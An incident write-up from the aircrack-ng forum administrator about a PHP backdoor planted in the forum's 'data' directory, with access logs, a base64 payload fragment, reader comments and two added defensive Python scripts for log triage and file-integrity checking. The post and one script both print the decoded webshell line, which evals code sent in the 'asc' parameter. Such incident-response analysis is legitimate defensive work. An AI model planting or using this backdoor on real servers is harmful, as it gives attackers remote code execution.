Tuesday, May 29, 2012

Forum virus details

Hi,

as you know, I shut down the server a few days ago because I was told there was a virus. Here is what I know about it so far. This post will be updated as I know more. There is a summary at the end of this post which will be useful for your IT department.

Sophos detects it as Mal/Iframe-W. It was uploaded into a separate directory inside the forum, 'data', as a piece of PHP called rbvzv.php (1418 bytes) that carries a payload encoded in base64. The decoded payload is passed to PHP's eval(), which executes it.
If any of you guys are interested in the piece of code, you can download it here (the password is rbvzv.php); please don't use it for malicious purposes. I'd love to know what it does but unfortunately I don't have the knowledge yet to decode it. I can read JavaScript, but the problem is that it's not plain Base64.

I checked the whole server: the attacker got in through the web server, there was no login, and Apache didn't have any privileges (a user without bash, etc.).

For those who are interested, here is the raw apache log from the attack:
91.224.160.132 - - [23/May/2012:01:12:04 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 15 "http://forum.aircrack-ng.org/phpmyadmin/index.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)"
190.102.136.196 - - [23/May/2012:20:22:43 +0200] "POST /data/rbvzv.php HTTP/1.0" 200 727 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
81.30.222.42 - - [23/May/2012:20:23:26 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
116.55.19.96 - - [23/May/2012:20:24:50 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
61.50.171.2 - - [23/May/2012:20:28:15 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
178.218.224.2 - - [23/May/2012:20:27:01 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
200.222.109.146 - - [24/May/2012:07:48:55 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0"
200.223.136.254 - - [24/May/2012:11:50:31 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
210.101.131.232 - - [24/May/2012:15:49:50 +0200] "POST /data/rbvzv.php??asc=eval(base64_decode(%27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP/1.1" 200 19 "-" "Chrome/15.0.860.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/15.0.860.0"


As you can see, the file was created by that first guy, 91.224.160.132, and the timestamp (creation and last modification) of the file confirms it:
-rw-r--r-- 1 USER GROUP 1418 2012-05-23 01:12 rbvzv.php

I have to thank @SwissHttp on twitter for decoding it and here is the result (PHP):
if(isset($_REQUEST['a'.'s'.'c']))eval(stripslashes($_REQUEST['a'.'s'.'c']));


Basically, it runs whatever PHP is passed in the request parameter 'asc' (after stripping slashes); the last line of the Apache log posted above shows an example use. I'll see if I can get my hands on the complete request and not just part of it.

Unfortunately, I don't think I can do anything against those guys (besides talking about it), a whois on that IP address looks like it's a shady business (Bergdorf Group Ltd): IP in the Netherlands but the person to contact lives in the Virgin Islands. Anyway, I sent them an email. I got an answer this morning (May 30) asking for some more information that I just provided. We'll see how it goes.

As far as I know, it is limited to the forum and nothing else. The attacker didn't get on the server or install any backdoor.

So here is what I'm gonna do next: I'll check the forum database to see if they tried anything else against the forum (and check the Apache logs to see if there is any other mention of those IP addresses). I want to know how it happened exactly and when.
The forum is probably going to stay down for another week: I want to migrate it to another server and I need to make sure everything works properly and that the new DNS records have propagated.
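The log triage described above (decoding the 'asc' parameter on the last log line, and the planned check for other requests from the attacker IPs), written out as an added example. This is not code from the original post or from the aircrack-ng project. It parses the Apache "combined" log lines quoted in the post (user agents shortened) plus two lines constructed for the demo (an earlier GET from 91.224.160.132 to show the pivot step, and a benign GET from 203.0.113.7), converts the timestamps to UTC, lists the IPs that used /data/rbvzv.php, decodes the base64 from the asc= request, and reports everything else those IPs did in the log. The file name and parameter name come from the post; the function names are assumptions.

```python
"""Triage of the Apache access-log lines quoted above.

Added example; not code from the original post or the aircrack-ng project.
The log format (Apache "combined"), the dropped file /data/rbvzv.php and the
'asc' parameter come from the post; function names and the two lines marked
CONSTRUCTED below are assumptions made for the demo.
"""
import base64
import re
from datetime import datetime, timezone
from urllib.parse import unquote, urlsplit

DROPPED_FILE = "/data/rbvzv.php"

# Apache combined format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
B64_RE = re.compile(r"base64_decode\(['\"]?([A-Za-z0-9+/=]+)")

# Lines from the post with user agents shortened. Two lines are CONSTRUCTED for
# the demo: the first GET from 91.224.160.132 (shows the pivot step) and the
# benign GET from 203.0.113.7.
SAMPLE_LOG = """\
91.224.160.132 - - [23/May/2012:01:11:50 +0200] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"
91.224.160.132 - - [23/May/2012:01:12:04 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 15 "http://forum.aircrack-ng.org/phpmyadmin/index.php" "Mozilla/4.0 (compatible; MSIE 8.0)"
190.102.136.196 - - [23/May/2012:20:22:43 +0200] "POST /data/rbvzv.php HTTP/1.0" 200 727 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"
61.50.171.2 - - [23/May/2012:20:28:15 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"
178.218.224.2 - - [23/May/2012:20:27:01 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"
203.0.113.7 - - [24/May/2012:09:00:00 +0200] "GET /index.php?board=1.0 HTTP/1.1" 200 23011 "-" "Mozilla/5.0"
210.101.131.232 - - [24/May/2012:15:49:50 +0200] "POST /data/rbvzv.php??asc=eval(base64_decode(%27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP/1.1" 200 19 "-" "Chrome/15.0.860.0"
"""


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    # %t is "day/Mon/year:H:M:S zone"; normalise to UTC so times can be compared
    # with the UTC times given in the post's summary.
    e["time"] = datetime.strptime(e["time"], "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
    e["path"] = urlsplit(e["uri"]).path
    return e


def decode_asc_payload(uri):
    """Recover the PHP sent in an 'asc=' query parameter, or None if there is none.

    Only a payload placed in the URL can be recovered from the access log: the
    log keeps the request line, not the POST body, so the other POSTs to the
    backdoor leave no payload here at all. The logged value is cut off, so the
    base64 padding is repaired before decoding.
    """
    query = unquote(urlsplit(uri).query)
    if "asc=" not in query:
        return None
    m = B64_RE.search(query)
    if not m:
        return query.split("asc=", 1)[1]  # PHP passed in clear text
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-8", errors="replace")


def triage(log_text):
    """Who used the dropped file, when (UTC), what they sent, and what else they did."""
    entries = [e for e in map(parse_line, log_text.splitlines()) if e]
    entries.sort(key=lambda e: e["time"])  # the post's lines are not in time order
    hits = [e for e in entries if e["path"] == DROPPED_FILE]
    ips = {e["ip"] for e in hits}
    payloads = []
    for e in hits:
        php = decode_asc_payload(e["uri"])
        if php:
            payloads.append((e["ip"], e["time"], php))
    return {
        "first_seen": (hits[0]["ip"], hits[0]["time"]) if hits else None,
        "last_seen": (hits[-1]["ip"], hits[-1]["time"]) if hits else None,
        "attacker_ips": ips,
        "payloads": payloads,
        # Pivot: every other request from those IPs. The one just before the
        # first hit is the best lead on how the file was written.
        "pivot": [e for e in entries if e["ip"] in ips and e["path"] != DROPPED_FILE],
    }


if __name__ == "__main__":
    r = triage(SAMPLE_LOG)
    print("first seen:", *r["first_seen"])
    print("attacker IPs:", ", ".join(sorted(r["attacker_ips"])))
    for ip, t, php in r["payloads"]:
        print(f"{ip} at {t:%Y-%m-%d %H:%M:%S} UTC sent: {php!r}")
    for e in r["pivot"]:
        print(f"pivot: {e['ip']} {e['time']:%Y-%m-%d %H:%M:%S} {e['method']} {e['uri']}")
```

On the sample above, the first hit resolves to 2012-05-22 23:12:04 UTC, which is the time the summary gives, and the decoded fragment reads error_reporting(-1);set_time_limit(1800);ignore_user_abort(1); followed by the start of a $paths assignment, cut off where the log line ends. What this cannot recover is what the other POSTs sent: the access log records the request line only, so a payload in the POST body is never logged, and the complete request the post hopes to find would have to come from a request-body logger (mod_security audit log, mod_dumpio) or a packet capture.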


So, to summarize: it happened a day before I got the email letting me know there was a virus. It happened May 22 at 23:12 (11:12 pm) GMT/UTC and I stopped it on May 24, around 14:00 (2 pm) GMT/UTC.
I don't remember noticing anything special when browsing the forum between those dates (I'm not sure if I browsed it on those dates). In case you experienced anything, let me know. I'm really sorry about it.

14 comments:

  1. The people at http://code.google.com/p/malware-lu/ can probably help you out with the code!

  2. I dunno why, but I love reading things in this format.

  3. The Base64 string in the GET-request you shared contains: error_reporting(-1);set_time_limit(1800);ignore_user_abort(1);
    $paths = '/

    Send me the (complete) files you want to have decoded. (i.e. the rbvzv.php file.)

    Concerning the user agents, they may be spoofed but otherwise the attacker used Windows XP and Vista.

    In case you had phpmyadmin installed (and it was publicly accessible e.g. here http://forum.aircrack-ng.org/phpmyadmin/index.php ), it was most likely that application that was compromised.

    Unauthorized attackers often find critical vulnerabilities in this application or use well-known ones that aren't patched to execute arbitrary code on the system.

    You can reach me at: owasp [don't add this] intern0t [remove this] net.


    Best regards,
    MaXe

    Replies
    1. I was able to decode that part. Unfortunately, I only have what I posted here (I guess Apache truncated it) :/

      I don't have phpMyAdmin installed on any server for security reasons and I still have to figure out that first Apache log line.
      What I mean is that I'll check out if there are any other requests by that IP (and any other linked to that attack) and if there is anything else around that time.

    2. There isn't much to know about the first line if you're 300% sure you don't have phpMyAdmin installed :-) Then the referrer is either just spoofed or they came from that URL when they sent that POST-request.
      I would instead try to look for references to that backdoor file, and find out if any other POST- or GET-request created it.

      If not, they could've gotten in other ways as well. If you use a VPS provider, the management interface could be insecure (Linode had this problem a while ago), where you could have the most secure server in the world, but still be compromised somewhat. (Of course there are ways to protect against that as well as you are most likely aware of.)

      I've tweeted you the decoded file, it seems pretty "basic", even though I've never seen encoding like that before. (I've seen more advanced examples often created with public tools, but this containing that much garbage data is quite interesting.)

    3. I've got more, I'll create another post about it today.

  4. a usable iframe exploit? o_O

  5. Question is;
    Why &amp; how were they able to upload a PHP file on your forum in the first place?

    Did you MD5Sum/SHA1 your code ? If so, any changes ?

    Replies
    1. I also have that question and I want to have the answer before I put the server back up.

      Yes, they did some changes to the PHP files, I'll post details about it today.

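The check asked about in the comment above (hash the forum's files and compare) as an added example, not code from the original post or from any forum package: it takes a SHA-256 baseline of a web root, reports files added or modified since, and scans the changed PHP files for the shape of the dropped backdoor (eval() fed from a request variable or a base64 blob, or a PHP file inside a web-writable directory such as 'data'). The directory layout and file contents are constructed for the demo, except the decoded rbvzv.php one-liner, which is the one quoted in the post; the function names and the 'data' directory convention are assumptions.

```python
"""Integrity check of a PHP web root: baseline hashes, diff, webshell markers.

Added example; not code from the original post or any forum package. The
directory layout and contents are CONSTRUCTED for the demo, except the
decoded rbvzv.php one-liner quoted in the post.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Directories the web server is expected to write to (attachments, cache).
# A PHP file showing up there is suspicious whatever its content.
WRITABLE_DIRS = ("data",)

MARKERS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "request_var": re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\b"),
    # 'a'.'s'.'c' style key assembly, used to dodge a naive grep for the name
    "string_concat": re.compile(r"'[^']'\s*\.\s*'[^']'"),
}

# Decoded backdoor from the post, wrapped in PHP tags for the demo file.
BACKDOOR = "<?php if(isset($_REQUEST['a'.'s'.'c']))eval(stripslashes($_REQUEST['a'.'s'.'c'])); ?>\n"


def hash_tree(root):
    """Map each file's path (relative to root, POSIX form) to its SHA-256 digest.

    Only content hashes are compared: an attacker can set a file's mtime, so
    the ls timestamp the post relied on is a hint, not evidence.
    """
    root = Path(root)
    digests = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        h = hashlib.sha256()
        with path.open("rb") as f:
            for chunk in iter(lambda: f.read(1 << 16), b""):
                h.update(chunk)
        digests[path.relative_to(root).as_posix()] = h.hexdigest()
    return digests


def diff_baseline(baseline, current):
    """Split the current tree into added / modified / removed relative to the baseline."""
    common = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def scan_php(root, paths):
    """Return {relpath: [reasons]} for the PHP files in `paths` that look like backdoors."""
    findings = {}
    for rel in paths:
        if not rel.endswith(".php"):
            continue
        reasons = []
        if rel.split("/", 1)[0] in WRITABLE_DIRS:
            reasons.append("php file in web-writable directory")
        text = (Path(root) / rel).read_text(errors="replace")
        hits = {name for name, rx in MARKERS.items() if rx.search(text)}
        # eval() of a request variable or a base64 blob is the classic shape.
        if "eval" in hits and hits & {"base64_decode", "request_var"}:
            reasons.append("eval with " + ", ".join(sorted(hits - {"eval"})))
        if reasons:
            findings[rel] = reasons
    return findings


def demo():
    """Build a constructed web root, take a baseline, simulate the compromise, check."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "include").mkdir()
        (root / "data").mkdir()
        (root / "index.php").write_text("<?php require 'include/config.php'; echo 'forum'; ?>\n")
        (root / "include" / "config.php").write_text("<?php\n$db_host = 'localhost';\n")
        (root / "data" / "attach_001.dat").write_bytes(b"\x89PNG\r\n")
        baseline = hash_tree(root)

        # Simulated compromise: a dropped backdoor plus a legitimate file that
        # had an eval(base64_decode(...)) line appended (CONSTRUCTED payload).
        (root / "data" / "rbvzv.php").write_text(BACKDOOR)
        with (root / "include" / "config.php").open("a") as f:
            f.write("eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw=='));\n")

        changes = diff_baseline(baseline, hash_tree(root))
        findings = scan_php(root, changes["added"] + changes["modified"])
        return changes, findings


if __name__ == "__main__":
    changes, findings = demo()
    for kind, paths in changes.items():
        print(f"{kind}: {paths}")
    for rel, reasons in findings.items():
        print(f"SUSPICIOUS {rel}: {'; '.join(reasons)}")
```

In practice the baseline is taken from a clean copy (the release tarball of the forum software plus a known-good export of local customisations), not from the compromised host, and the marker scan is a starting point rather than a verdict: it catches the shape seen here but not payloads that rebuild function names at runtime, which is why the diff against the baseline is the part to trust.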
  6. I recommend ZB Block. Written in php it is made to protect against such attacks. http://www.spambotsecurity.com/zbblock.php

    Give it a try.

  7. hey all,

    I was amazed by what I have just read, but I only understood a few lines of it.

    I feel like you are great and advanced people in that field. I'm at college in the Computer Science field and really hope to understand what you are talking about. Can anyone here tell me the steps I should follow to understand what you are talking about? :)
